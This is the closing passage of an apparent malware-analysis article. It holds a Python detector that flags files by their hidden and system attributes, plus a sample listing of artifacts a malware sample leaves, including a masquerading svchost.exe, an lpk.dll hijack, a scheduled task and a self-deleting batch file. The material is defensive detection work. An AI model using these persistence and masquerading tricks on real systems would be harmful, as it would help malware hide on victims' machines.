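    """entries: (path, attribute bitmask) pairs. Returns {path: reasons} for every hit."""
    hits: Dict[str, List[str]] = {}
    for path, attrs in entries:
        reasons = classify(path, attrs)
        if reasons:
            hits[path] = reasons
    return hits


# Constructed listing: two genuine system files plus the artifacts this sample leaves.
SAMPLE_LISTING = [
    (r"C:\Windows\System32\svchost.exe", 0x20),
    (r"C:\Windows\System32\lpk.dll", 0x20),
    (r"C:\Windows\svchost.exe", 0x23),
    (r"C:\Windows\lpk.dll", 0x23),
    (r"C:\Windows\wsock32x.dll", 0x23),
    (r"C:\Windows\avp.exe", 0x23),
    (r"C:\Windows\Tasks\At1.job", 0x20),
    (r"C:\Deleteme.bat", 0x20),
]

if __name__ == "__main__":
    for hit_path, why in scan(SAMPLE_LISTING).items():
        print(hit_path, "->", "; ".join(why))
```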
Everything in this article was tested locally or with the target's authorization and is provided for educational and research purposes; key sensitive details and code have been removed to prevent malicious use. The author does not encourage or support any form of illegal activity.